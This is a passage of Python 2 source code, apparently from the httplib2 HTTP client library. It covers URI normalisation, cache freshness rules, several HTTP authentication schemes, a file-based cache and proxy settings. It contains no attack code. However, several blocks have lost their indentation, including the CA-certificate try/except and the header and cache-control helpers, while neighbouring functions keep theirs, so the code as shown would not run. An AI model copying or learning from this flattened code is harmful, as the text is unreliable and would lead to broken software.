'UnimplementedHmacDigestAuthOptionError',
'debuglevel', 'ProxiesUnavailableError']
# The httplib debug level, set to a non-zero value to get debug output
debuglevel = 0
# A request will be tried 'RETRIES' times if it fails at the socket/connection level.
RETRIES = 2
# Python 2.3 support
# Python 2.3 support: builtins lack sorted(); provide an in-place fallback.
if sys.version_info < (2,4):
    def sorted(seq):
        seq.sort()
        return seq

# Python 2.3 support: backport HTTPResponse.getheaders().
def HTTPResponse__getheaders(self):
    """Return list of (header, value) tuples."""
    if self.msg is None:
        raise httplib.ResponseNotReady()
    return self.msg.items()

if not hasattr(httplib.HTTPResponse, 'getheaders'):
    httplib.HTTPResponse.getheaders = HTTPResponse__getheaders

# All exceptions raised here derive from HttpLib2Error
class HttpLib2Error(Exception): pass

# Some exceptions can be caught and optionally
# be turned back into responses.
class HttpLib2ErrorWithResponse(HttpLib2Error):
    # Carries the offending response and body so callers can opt to treat
    # the error as an ordinary response.
    def __init__(self, desc, response, content):
        self.response = response
        self.content = content
        HttpLib2Error.__init__(self, desc)

class RedirectMissingLocation(HttpLib2ErrorWithResponse): pass
class RedirectLimit(HttpLib2ErrorWithResponse): pass
class FailedToDecompressContent(HttpLib2ErrorWithResponse): pass
class UnimplementedDigestAuthOptionError(HttpLib2ErrorWithResponse): pass
class UnimplementedHmacDigestAuthOptionError(HttpLib2ErrorWithResponse): pass

class MalformedHeader(HttpLib2Error): pass
class RelativeURIError(HttpLib2Error): pass
class ServerNotFoundError(HttpLib2Error): pass
class ProxiesUnavailableError(HttpLib2Error): pass
class CertificateValidationUnsupported(HttpLib2Error): pass
class SSLHandshakeError(HttpLib2Error): pass
class NotSupportedOnThisPlatform(HttpLib2Error): pass
class CertificateHostnameMismatch(SSLHandshakeError):
    # Records the host and certificate involved in a hostname mismatch.
    def __init__(self, desc, host, cert):
        HttpLib2Error.__init__(self, desc)
        self.host = host
        self.cert = cert
# Open Items:
# -----------
# Proxy support
# Are we removing the cached content too soon on PUT (only delete on 200 Maybe?)
# Pluggable cache storage (supports storing the cache in
# flat files by default. We need a plug-in architecture
# that can support Berkeley DB and Squid)
# == Known Issues ==
# Does not handle a resource that uses conneg and Last-Modified but no ETag as a cache validator.
# Does not handle Cache-Control: max-stale
# Does not use Age: headers when calculating cache freshness.
# The number of redirections to follow before giving up.
# Note that only GET redirects are automatically followed.
# Will also honor 301 requests by saving that info and never
# requesting that URI again.
DEFAULT_MAX_REDIRECTS = 5
try:
# Users can optionally provide a module that tells us where the CA_CERTS
# are located.
import ca_certs_locater
CA_CERTS = ca_certs_locater.get()
except ImportError:
# Default CA certificates file bundled with httplib2.
CA_CERTS = os.path.join(
os.path.dirname(os.path.abspath(__file__ )), "cacerts.txt")
# Which headers are hop-by-hop headers by default
HOP_BY_HOP = ['connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade']
def _get_end2end_headers(response):
hopbyhop = list(HOP_BY_HOP)
hopbyhop.extend([x.strip() for x in response.get('connection', '').split(',')])
return [header for header in response.keys() if header not in hopbyhop]
# Regex from Appendix B of RFC 3986 for breaking a URI into components.
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")


def parse_uri(uri):
    """Parses a URI using the regex given in Appendix B of RFC 3986.

    (scheme, authority, path, query, fragment) = parse_uri(uri)
    """
    groups = URI.match(uri).groups()
    return (groups[1], groups[3], groups[4], groups[6], groups[8])


def urlnorm(uri):
    """Normalize an absolute URI.

    Lower-cases the scheme and authority, defaults an empty path to "/",
    and returns (scheme, authority, request_uri, defrag_uri) where
    request_uri is the path plus query and defrag_uri omits the fragment.

    Raises RelativeURIError if *uri* lacks a scheme or authority.
    """
    (scheme, authority, path, query, fragment) = parse_uri(uri)
    if not scheme or not authority:
        raise RelativeURIError("Only absolute URIs are allowed. uri = %s" % uri)
    # Scheme and authority are case-insensitive (RFC 3986 section 6.2.2.1).
    # (The original code redundantly lower-cased the scheme twice.)
    authority = authority.lower()
    scheme = scheme.lower()
    if not path:
        path = "/"
    # Could do syntax based normalization of the URI before
    # computing the digest. See Section 6.2.2 of Std 66.
    request_uri = query and "?".join([path, query]) or path
    defrag_uri = scheme + "://" + authority + request_uri
    return scheme, authority, request_uri, defrag_uri
# Cache filename construction (original borrowed from Venus http://intertwingly.net/code/venus/)
re_url_scheme = re.compile(r'^\w+://')
re_slash = re.compile(r'[?/:|]+')

def safename(filename):
    """Return a filename suitable for the cache.

    Strips dangerous and common characters to create a filename we
    can use to store the cache in.
    """
    try:
        if re_url_scheme.match(filename):
            # IDNA-encode the URL so non-ASCII hostnames become safe ASCII.
            if isinstance(filename,str):
                filename = filename.decode('utf-8')
                filename = filename.encode('idna')
            else:
                filename = filename.encode('idna')
    except UnicodeError:
        pass
    if isinstance(filename,unicode):
        filename=filename.encode('utf-8')
    # _md5 is the md5 constructor imported at the top of this module.
    filemd5 = _md5(filename).hexdigest()
    filename = re_url_scheme.sub("", filename)
    filename = re_slash.sub(",", filename)

    # limit length of filename; the appended md5 keeps truncated names unique
    if len(filename)>200:
        filename=filename[:200]
    return ",".join((filename, filemd5))
NORMALIZE_SPACE = re.compile(r'(?:\r\n)?[ \t]+')
def _normalize_headers(headers):
return dict([ (key.lower(), NORMALIZE_SPACE.sub(value, ' ').strip()) for (key, value) in headers.iteritems()])
def _parse_cache_control(headers):
retval = {}
if headers.has_key('cache-control'):
parts = headers['cache-control'].split(',')
parts_with_args = [tuple([x.strip().lower() for x in part.split("=", 1)]) for part in parts if -1 != part.find("=")]
parts_wo_args = [(name.strip().lower(), 1) for name in parts if -1 == name.find("=")]
retval = dict(parts_with_args + parts_wo_args)
return retval
# Whether to use a strict mode to parse WWW-Authenticate headers
# Might lead to bad results in case of ill-formed header value,
# so disabled by default, falling back to relaxed parsing.
# Set to true to turn on, usefull for testing servers.
USE_WWW_AUTH_STRICT_PARSING = 0
# In regex below:
# [^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+ matches a "token" as defined by HTTP
# "(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?" matches a "quoted-string" as defined by HTTP, when LWS have already been replaced by a single space
# Actually, as an auth-param value can be either a token or a quoted-string, they are combined in a single pattern which matches both:
# \"?((?<=\")(?:[^\0-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x08\x0A-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?
WWW_AUTH_STRICT = re.compile(r"^(?:\s*(?:,\s*)?([^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+)\s*=\s*\"?((?<=\")(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?)(.*)$")
WWW_AUTH_RELAXED = re.compile(r"^(?:\s*(?:,\s*)?([^ \t\r\n=]+)\s*=\s*\"?((?<=\")(?:[^\\\"]|\\.)*?(?=\")|(?<!\")[^ \t\r\n,]+(?!\"))\"?)(.*)$")
UNQUOTE_PAIRS = re.compile(r'\\(.)')
def _parse_www_authenticate(headers, headername='www-authenticate'):
    """Returns a dictionary of dictionaries, one dict
    per auth_scheme.

    Each key is a lower-cased scheme name (e.g. 'digest') mapping to a dict
    of that scheme's lower-cased auth-param names and unquoted values.
    Raises MalformedHeader when the header value cannot be parsed.
    """
    retval = {}
    if headers.has_key(headername):
        try:
            authenticate = headers[headername].strip()
            # Strict parsing follows the HTTP grammar exactly; relaxed (the
            # default, see USE_WWW_AUTH_STRICT_PARSING) tolerates ill-formed
            # values.
            www_auth = USE_WWW_AUTH_STRICT_PARSING and WWW_AUTH_STRICT or WWW_AUTH_RELAXED
            while authenticate:
                # Break off the scheme at the beginning of the line
                if headername == 'authentication-info':
                    # Authentication-Info carries no scheme token; treat it
                    # as implicitly Digest.
                    (auth_scheme, the_rest) = ('digest', authenticate)
                else:
                    (auth_scheme, the_rest) = authenticate.split(" ", 1)
                # Now loop over all the key value pairs that come after the scheme,
                # being careful not to roll into the next scheme
                match = www_auth.search(the_rest)
                auth_params = {}
                while match:
                    if match and len(match.groups()) == 3:
                        (key, value, the_rest) = match.groups()
                        # Undo quoted-pair escaping ("\x" -> "x") in the value.
                        auth_params[key.lower()] = UNQUOTE_PAIRS.sub(r'\1', value) # '\\'.join([x.replace('\\', '') for x in value.split('\\\\')])
                    match = www_auth.search(the_rest)
                retval[auth_scheme.lower()] = auth_params
                authenticate = the_rest.strip()
        except ValueError:
            # authenticate.split(" ", 1) raises ValueError when a scheme
            # token has no parameters after it.
            raise MalformedHeader("WWW-Authenticate")
    return retval
def _entry_disposition(response_headers, request_headers):
    """Determine freshness from the Date, Expires and Cache-Control headers.

    Returns one of "FRESH" (serve from cache), "STALE" (revalidate), or
    "TRANSPARENT" (bypass the cache entirely).

    We don't handle the following:

    1. Cache-Control: max-stale
    2. Age: headers are not used in the calculations.

    Note that this algorithm is simpler than you might think
    because we are operating as a private (non-shared) cache.
    This lets us ignore 's-maxage'. We can also ignore
    'proxy-invalidate' since we aren't a proxy.
    We will never return a stale document as
    fresh as a design decision, and thus the non-implementation
    of 'max-stale'. This also lets us safely ignore 'must-revalidate'
    since we operate as if every server has sent 'must-revalidate'.
    Since we are private we get to ignore both 'public' and
    'private' parameters. We also ignore 'no-transform' since
    we don't do any transformations.
    The 'no-store' parameter is handled at a higher level.
    So the only Cache-Control parameters we look at are:

    no-cache
    only-if-cached
    max-age
    min-fresh
    """
    retval = "STALE"
    cc = _parse_cache_control(request_headers)
    cc_response = _parse_cache_control(response_headers)

    if request_headers.has_key('pragma') and request_headers['pragma'].lower().find('no-cache') != -1:
        retval = "TRANSPARENT"
        if 'cache-control' not in request_headers:
            # Propagate the HTTP/1.0 Pragma into an HTTP/1.1 directive.
            request_headers['cache-control'] = 'no-cache'
    elif cc.has_key('no-cache'):
        retval = "TRANSPARENT"
    elif cc_response.has_key('no-cache'):
        retval = "STALE"
    elif cc.has_key('only-if-cached'):
        retval = "FRESH"
    elif response_headers.has_key('date'):
        # Freshness can only be computed when the origin supplied a Date.
        date = calendar.timegm(email.Utils.parsedate_tz(response_headers['date']))
        now = time.time()
        current_age = max(0, now - date)
        if cc_response.has_key('max-age'):
            try:
                freshness_lifetime = int(cc_response['max-age'])
            except ValueError:
                freshness_lifetime = 0
        elif response_headers.has_key('expires'):
            expires = email.Utils.parsedate_tz(response_headers['expires'])
            if None == expires:
                freshness_lifetime = 0
            else:
                freshness_lifetime = max(0, calendar.timegm(expires) - date)
        else:
            freshness_lifetime = 0
        # A request max-age overrides whatever the response allowed.
        if cc.has_key('max-age'):
            try:
                freshness_lifetime = int(cc['max-age'])
            except ValueError:
                freshness_lifetime = 0
        if cc.has_key('min-fresh'):
            try:
                min_fresh = int(cc['min-fresh'])
            except ValueError:
                min_fresh = 0
            # Pretend the entry is min-fresh seconds older than it is.
            current_age += min_fresh
        if freshness_lifetime > current_age:
            retval = "FRESH"
    return retval
def _decompressContent(response, new_content):
    """Return *new_content* decompressed per the Content-Encoding header.

    Supports gzip and deflate.  On success, content-length is fixed up and
    the original encoding is preserved under the synthetic
    '-content-encoding' key so it can't be mistaken for a live header.
    Raises FailedToDecompressContent when the body fails to decompress.
    """
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way that won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
def _updateCache(request_headers, response_headers, content, cache, cachekey):
    """Store the response in *cache* under *cachekey*, honoring no-store.

    The cached entry is a status line, then an RFC 822 header block, then
    the raw body.  Vary-listed request header values are recorded under
    synthetic '-varied-<name>' keys so a later request can be matched.
    """
    if cachekey:
        cc = _parse_cache_control(request_headers)
        cc_response = _parse_cache_control(response_headers)
        if cc.has_key('no-store') or cc_response.has_key('no-store'):
            cache.delete(cachekey)
        else:
            info = email.Message.Message()
            for key, value in response_headers.iteritems():
                if key not in ['status','content-encoding','transfer-encoding']:
                    info[key] = value

            # Add annotations to the cache to indicate what headers
            # are variant for this request.
            vary = response_headers.get('vary', None)
            if vary:
                vary_headers = vary.lower().replace(' ', '').split(',')
                for header in vary_headers:
                    key = '-varied-%s' % header
                    try:
                        info[key] = request_headers[header]
                    except KeyError:
                        pass

            status = response_headers.status
            if status == 304:
                # 304 means the cached body is still valid; store it as a
                # complete 200 so later cache hits replay a full response.
                status = 200

            status_header = 'status: %d\r\n' % status

            header_str = info.as_string()

            # email.Message may emit bare \r or \n; normalize to CRLF.
            header_str = re.sub("\r(?!\n)|(?<!\r)\n", "\r\n", header_str)
            text = "".join([status_header, header_str, content])

            cache.set(cachekey, text)
def _cnonce():
    """Generate a random 16-hex-character client nonce for Digest auth."""
    # randrange(0, 10) covers every digit 0-9; the previous randrange(0, 9)
    # upper bound is exclusive, so '9' was silently omitted from the pool.
    dig = _md5("%s:%s" % (time.ctime(), ["0123456789"[random.randrange(0, 10)] for i in range(20)])).hexdigest()
    return dig[:16]
def _wsse_username_token(cnonce, iso_now, password):
    """Compute the base64 SHA-1 PasswordDigest used by the WSSE profile."""
    digest = _sha("%s%s%s" % (cnonce, iso_now, password)).digest()
    return base64.b64encode(digest).strip()
# For credentials we need two things, first
# a pool of credentials to try (not necessarily tied to Basic, Digest, etc.)
# Then we also need a list of URIs that have already demanded authentication
# That list is tricky since sub-URIs can take the same auth, or the
# auth scheme may change as you descend the tree.
# So we also need each Auth instance to be able to tell us
# how close to the 'top' it is.
class Authentication(object):
    """Base class tracking one auth scheme's state for a URI subtree."""

    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        # Only the path component of the URI matters here: it defines the
        # subtree that this authentication object applies to.
        (scheme, authority, path, query, fragment) = parse_uri(request_uri)
        self.path = path
        self.host = host
        self.credentials = credentials
        self.http = http

    def depth(self, request_uri):
        """Return how many '/' levels below this auth's root the URI sits."""
        (scheme, authority, path, query, fragment) = parse_uri(request_uri)
        return request_uri[len(self.path):].count("/")

    def inscope(self, host, request_uri):
        """True when *request_uri* on *host* falls under this auth's scope."""
        # XXX Should we normalize the request_uri?
        (scheme, authority, path, query, fragment) = parse_uri(request_uri)
        if host != self.host:
            return False
        return path.startswith(self.path)

    def request(self, method, request_uri, headers, content):
        """Modify the request headers to add the appropriate
        Authorization header. Over-ride this in sub-classes."""
        pass

    def response(self, response, content):
        """Gives us a chance to update with new nonces
        or such returned from the last authorized response.
        Over-ride this in sub-classes if necessary.

        Return TRUE if the request is to be retried, for
        example Digest may return stale=true.
        """
        return False
class BasicAuthentication(Authentication):
    """RFC 2617 Basic: send base64(name:password) on every request."""

    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)

    def request(self, method, request_uri, headers, content):
        """Attach the Basic Authorization header to *headers*."""
        credential_pair = "%s:%s" % self.credentials
        headers['authorization'] = 'Basic ' + base64.b64encode(credential_pair).strip()
class DigestAuthentication(Authentication):
    """Only do qop='auth' and MD5, since that
    is all Apache currently implements"""
    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
        challenge = _parse_www_authenticate(response, 'www-authenticate')
        self.challenge = challenge['digest']
        qop = self.challenge.get('qop', 'auth')
        # Keep 'auth' only if the server offered it; anything else is refused.
        self.challenge['qop'] = ('auth' in [x.strip() for x in qop.split()]) and 'auth' or None
        if self.challenge['qop'] is None:
            raise UnimplementedDigestAuthOptionError( _("Unsupported value for qop: %s." % qop))
        self.challenge['algorithm'] = self.challenge.get('algorithm', 'MD5').upper()
        if self.challenge['algorithm'] != 'MD5':
            raise UnimplementedDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
        # A1 per RFC 2617: username ":" realm ":" password.
        self.A1 = "".join([self.credentials[0], ":", self.challenge['realm'], ":", self.credentials[1]])
        # Nonce count: incremented on every request signed with this nonce.
        self.challenge['nc'] = 1

    def request(self, method, request_uri, headers, content, cnonce = None):
        """Modify the request headers to add a Digest Authorization header.

        *cnonce* may be supplied (e.g. by tests) to make the digest
        deterministic; otherwise a fresh client nonce is generated.
        """
        H = lambda x: _md5(x).hexdigest()
        KD = lambda s, d: H("%s:%s" % (s, d))
        A2 = "".join([method, ":", request_uri])
        self.challenge['cnonce'] = cnonce or _cnonce()
        request_digest = '"%s"' % KD(H(self.A1), "%s:%s:%s:%s:%s" % (
            self.challenge['nonce'],
            '%08x' % self.challenge['nc'],
            self.challenge['cnonce'],
            self.challenge['qop'], H(A2)))
        headers['authorization'] = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", algorithm=%s, response=%s, qop=%s, nc=%08x, cnonce="%s"' % (
                self.credentials[0],
                self.challenge['realm'],
                self.challenge['nonce'],
                request_uri,
                self.challenge['algorithm'],
                request_digest,
                self.challenge['qop'],
                self.challenge['nc'],
                self.challenge['cnonce'])
        if self.challenge.get('opaque'):
            headers['authorization'] += ', opaque="%s"' % self.challenge['opaque']
        self.challenge['nc'] += 1

    def response(self, response, content):
        """Pick up new nonces from the server.

        Returns True (retry the request) when the server reported our nonce
        as stale; otherwise records any nextnonce and returns False.
        """
        if not response.has_key('authentication-info'):
            challenge = _parse_www_authenticate(response, 'www-authenticate').get('digest', {})
            if 'true' == challenge.get('stale'):
                # Server rejected the nonce but the credentials are fine:
                # adopt the new nonce, reset the count, and retry.
                self.challenge['nonce'] = challenge['nonce']
                self.challenge['nc'] = 1
                return True
        else:
            updated_challenge = _parse_www_authenticate(response, 'authentication-info').get('digest', {})
            if updated_challenge.has_key('nextnonce'):
                self.challenge['nonce'] = updated_challenge['nextnonce']
                self.challenge['nc'] = 1
        return False
class HmacDigestAuthentication(Authentication):
    """Adapted from Robert Sayre's code and DigestAuthentication above."""
    __author__ = "Thomas Broyer (t.broyer@ltgt.net)"

    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
        challenge = _parse_www_authenticate(response, 'www-authenticate')
        self.challenge = challenge['hmacdigest']
        # TODO: self.challenge['domain']
        self.challenge['reason'] = self.challenge.get('reason', 'unauthorized')
        if self.challenge['reason'] not in ['unauthorized', 'integrity']:
            self.challenge['reason'] = 'unauthorized'
        self.challenge['salt'] = self.challenge.get('salt', '')
        if not self.challenge.get('snonce'):
            raise UnimplementedHmacDigestAuthOptionError( _("The challenge doesn't contain a server nonce, or this one is empty."))
        self.challenge['algorithm'] = self.challenge.get('algorithm', 'HMAC-SHA-1')
        if self.challenge['algorithm'] not in ['HMAC-SHA-1', 'HMAC-MD5']:
            raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
        self.challenge['pw-algorithm'] = self.challenge.get('pw-algorithm', 'SHA-1')
        if self.challenge['pw-algorithm'] not in ['SHA-1', 'MD5']:
            raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for pw-algorithm: %s." % self.challenge['pw-algorithm']))
        # Pick hash modules matching the negotiated algorithms.
        if self.challenge['algorithm'] == 'HMAC-MD5':
            self.hashmod = _md5
        else:
            self.hashmod = _sha
        if self.challenge['pw-algorithm'] == 'MD5':
            self.pwhashmod = _md5
        else:
            self.pwhashmod = _sha
        # Derived HMAC key: H(username ":" H(password + salt) ":" realm).
        self.key = "".join([self.credentials[0], ":",
                    self.pwhashmod.new("".join([self.credentials[1], self.challenge['salt']])).hexdigest().lower(),
                    ":", self.challenge['realm']])
        self.key = self.pwhashmod.new(self.key).hexdigest().lower()

    def request(self, method, request_uri, headers, content):
        """Modify the request headers to add the HMACDigest Authorization
        header, signing the end-to-end request headers with the derived key."""
        keys = _get_end2end_headers(headers)
        keylist = "".join(["%s " % k for k in keys])
        headers_val = "".join([headers[k] for k in keys])
        created = time.strftime('%Y-%m-%dT%H:%M:%SZ',time.gmtime())
        cnonce = _cnonce()
        request_digest = "%s:%s:%s:%s:%s" % (method, request_uri, cnonce, self.challenge['snonce'], headers_val)
        request_digest = hmac.new(self.key, request_digest, self.hashmod).hexdigest().lower()
        headers['authorization'] = 'HMACDigest username="%s", realm="%s", snonce="%s", cnonce="%s", uri="%s", created="%s", response="%s", headers="%s"' % (
                self.credentials[0],
                self.challenge['realm'],
                self.challenge['snonce'],
                cnonce,
                request_uri,
                created,
                request_digest,
                keylist)

    def response(self, response, content):
        """Return True (retry) when the server reports an integrity or
        staleness problem rather than bad credentials."""
        challenge = _parse_www_authenticate(response, 'www-authenticate').get('hmacdigest', {})
        if challenge.get('reason') in ['integrity', 'stale']:
            return True
        return False
class WsseAuthentication(Authentication):
    """WSSE UsernameToken authentication (thinly tested; use with care).

    At this time there isn't any third party server to test against.
    Blogger and TypePad implemented this algorithm at one point, but
    Blogger has since switched to Basic over HTTPS and TypePad implemented
    it wrong by never issuing a 401 challenge, instead requiring the client
    to telepathically know that the endpoint expects WSSE
    profile="UsernameToken"."""

    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)

    def request(self, method, request_uri, headers, content):
        """Attach the WSSE 'authorization' and 'X-WSSE' request headers."""
        headers['authorization'] = 'WSSE profile="UsernameToken"'
        iso_now = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
        cnonce = _cnonce()
        password_digest = _wsse_username_token(cnonce, iso_now, self.credentials[1])
        token = 'UsernameToken Username="%s", PasswordDigest="%s", Nonce="%s", Created="%s"' % (
            self.credentials[0], password_digest, cnonce, iso_now)
        headers['X-WSSE'] = token
class GoogleLoginAuthentication(Authentication):
    """Google ClientLogin: exchanges the credentials for an Auth token by
    POSTing to www.google.com at construction time (does network I/O)."""

    def __init__(self, credentials, host, request_uri, headers, response, content, http):
        from urllib import urlencode
        Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
        challenge = _parse_www_authenticate(response, 'www-authenticate')
        service = challenge['googlelogin'].get('service', 'xapi')
        # Blogger actually returns the service in the challenge
        # For the rest we guess based on the URI
        if service == 'xapi' and request_uri.find("calendar") > 0:
            service = "cl"
        # No point in guessing Base or Spreadsheet
        #elif request_uri.find("spreadsheets") > 0:
        #    service = "wise"

        auth = dict(Email=credentials[0], Passwd=credentials[1], service=service, source=headers['user-agent'])
        resp, content = self.http.request("https://www.google.com/accounts/ClientLogin", method="POST", body=urlencode(auth), headers={'Content-Type': 'application/x-www-form-urlencoded'})
        # Response body is newline-separated key=value pairs.
        lines = content.split('\n')
        d = dict([tuple(line.split("=", 1)) for line in lines if line])
        if resp.status == 403:
            # Login refused; an empty token makes later requests fail cleanly.
            self.Auth = ""
        else:
            self.Auth = d['Auth']

    def request(self, method, request_uri, headers, content):
        """Modify the request headers to add the appropriate
        Authorization header."""
        headers['authorization'] = 'GoogleLogin Auth=' + self.Auth
# Registry mapping a lower-cased WWW-Authenticate scheme name to the
# Authentication subclass that implements it.
AUTH_SCHEME_CLASSES = {
    "basic": BasicAuthentication,
    "wsse": WsseAuthentication,
    "digest": DigestAuthentication,
    "hmacdigest": HmacDigestAuthentication,
    "googlelogin": GoogleLoginAuthentication
}

# Preference order when a server offers several schemes: strongest first.
AUTH_SCHEME_ORDER = ["hmacdigest", "googlelogin", "digest", "wsse", "basic"]
class FileCache(object):
    """Uses a local directory as a store for cached files.
    Not really safe to use if multiple threads or processes are going to
    be running on the same cache.
    """
    def __init__(self, cache, safe=safename): # use safe=lambda x: md5.new(x).hexdigest() for the old behavior
        """*cache* is the directory name; *safe* maps a key to a safe filename."""
        self.cache = cache
        self.safe = safe
        if not os.path.exists(cache):
            os.makedirs(self.cache)

    def get(self, key):
        """Return the cached bytes for *key*, or None on a miss or read error."""
        retval = None
        cacheFullPath = os.path.join(self.cache, self.safe(key))
        try:
            # open() rather than the deprecated file() builtin.
            f = open(cacheFullPath, "rb")
            retval = f.read()
            f.close()
        except IOError:
            pass
        return retval

    def set(self, key, value):
        """Store *value* under *key*, overwriting any previous entry."""
        cacheFullPath = os.path.join(self.cache, self.safe(key))
        f = open(cacheFullPath, "wb")
        try:
            f.write(value)
        finally:
            # Always release the handle, even if the write fails midway.
            f.close()

    def delete(self, key):
        """Remove *key*'s entry; a no-op when no entry exists."""
        cacheFullPath = os.path.join(self.cache, self.safe(key))
        if os.path.exists(cacheFullPath):
            os.remove(cacheFullPath)
class Credentials(object):
    """A pool of (domain, name, password) triples used for authentication."""

    def __init__(self):
        self.credentials = []

    def add(self, name, password, domain=""):
        """Register *name*/*password*, optionally scoped to *domain*."""
        self.credentials.append((domain.lower(), name, password))

    def clear(self):
        """Forget every stored credential."""
        self.credentials = []

    def iter(self, domain):
        """Yield (name, password) pairs valid for *domain*.

        An empty stored domain acts as a wildcard matching every host.
        """
        for stored_domain, name, password in self.credentials:
            if stored_domain in ("", domain):
                yield (name, password)
class KeyCerts(Credentials):
    """Identical to Credentials except that
    name/password are mapped to key/cert.

    Holds SSL client key/certificate pairs, scoped by domain."""
    pass
class AllHosts(object):
    """Sentinel: assigning this class to ProxyInfo.bypass_hosts means
    'bypass the proxy for every host' (set when no_proxy='*')."""
    pass
class ProxyInfo(object):
    """Collect information required to use a proxy."""

    # Domains excluded from proxying; may also be the AllHosts sentinel.
    bypass_hosts = ()

    def __init__(self, proxy_type, proxy_host, proxy_port,
                 proxy_rdns=True, proxy_user=None, proxy_pass=None):
        """
        Args:
          proxy_type: One of the socks.PROXY_TYPE_XXX constants, e.g.
            p = ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP,
                proxy_host='localhost', proxy_port=8000)
          proxy_host: The hostname or IP address of the proxy server.
          proxy_port: The port the proxy server is running on.
          proxy_rdns: If True (default), DNS queries are handed to the proxy
            to resolve instead of being resolved locally; useful when the
            local network cannot resolve non-local names.  This defaulted to
            False in httplib2 0.9 and earlier.
          proxy_user: Username used to authenticate with the proxy server.
          proxy_pass: Password used to authenticate with the proxy server.
        """
        self.proxy_type = proxy_type
        self.proxy_host = proxy_host
        self.proxy_port = proxy_port
        self.proxy_rdns = proxy_rdns
        self.proxy_user = proxy_user
        self.proxy_pass = proxy_pass

    def astuple(self):
        """Return settings as a (type, host, port, rdns, user, pass) tuple."""
        return (self.proxy_type, self.proxy_host, self.proxy_port,
                self.proxy_rdns, self.proxy_user, self.proxy_pass)

    def isgood(self):
        """True when both a proxy host and a port have been configured."""
        return self.proxy_host is not None and self.proxy_port is not None

    def applies_to(self, hostname):
        """True when requests to *hostname* should go through the proxy."""
        return not self.bypass_host(hostname)

    def bypass_host(self, hostname):
        """Has this host been excluded from the proxy config"""
        if self.bypass_hosts is AllHosts:
            return True
        return any(hostname.endswith(domain) for domain in self.bypass_hosts)
def proxy_info_from_environment(method='http'):
    """Build a ProxyInfo from the $http_proxy/$https_proxy environment
    variables, honoring $no_proxy.

    Returns None when *method* is not 'http'/'https' or no proxy URL is set.
    """
    if method not in ('http', 'https'):
        return
    env_var = method + '_proxy'
    url = os.environ.get(env_var, os.environ.get(env_var.upper()))
    if not url:
        return
    pi = proxy_info_from_url(url, method)

    no_proxy = os.environ.get('no_proxy', os.environ.get('NO_PROXY', ''))
    if no_proxy == '*':
        # Special case: every host bypasses the proxy.
        pi.bypass_hosts = AllHosts
    elif no_proxy:
        pi.bypass_hosts = no_proxy.split(',')
    else:
        pi.bypass_hosts = []
    return pi
def proxy_info_from_url(url, method='http'):
    """Construct a ProxyInfo from a proxy URL (such as an http_proxy value).

    Understands optional "user:password@" credentials and an optional port;
    when no port is given, the scheme default (80/443) for *method* is used.
    """
    parsed = urlparse.urlparse(url)
    username = None
    password = None
    port = None
    netloc = parsed[1]
    if '@' in netloc:
        ident, host_port = netloc.split('@', 1)
        if ':' in ident:
            username, password = ident.split(':', 1)
        else:
            # A bare token before '@' is treated as the password.
            password = ident
    else:
        host_port = netloc
    if ':' in host_port:
        host, port = host_port.split(':', 1)
    else:
        host = host_port

    if port:
        port = int(port)
    else:
        port = dict(https=443, http=80)[method]

    proxy_type = 3  # socks.PROXY_TYPE_HTTP
    return ProxyInfo(
        proxy_type=proxy_type,
        proxy_host=host,
        proxy_port=port,
        proxy_user=username or None,
        proxy_pass=password or None,
    )
class HTTPConnectionWithTimeout(httplib.HTTPConnection):
    """
    HTTPConnection subclass that supports timeouts

    All timeouts are in seconds. If None is passed for timeout then
    Python's default timeout for sockets will be used. See for example
    the docs of socket.setdefaulttimeout():
    http://docs.python.org/library/socket.html#socket.setdefaulttimeout
    """

    def __init__(self, host, port=None, strict=None, timeout=None, proxy_info=None):
        httplib.HTTPConnection.__init__(self, host, port, strict)
        self.timeout = timeout
        self.proxy_info = proxy_info

    def connect(self):
        """Connect to the host and port specified in __init__."""
        # Mostly verbatim from httplib.py.
        if self.proxy_info and socks is None:
            raise ProxiesUnavailableError(
                'Proxy support missing but proxy use was requested!')
        msg = "getaddrinfo returns an empty list"
        if self.proxy_info and self.proxy_info.isgood():
            use_proxy = True
            proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
            # Resolve/connect to the proxy, not the origin server.
            host = proxy_host
            port = proxy_port
        else:
            use_proxy = False
            host = self.host
            port = self.port

        # Try each resolved address family in turn until one connects.
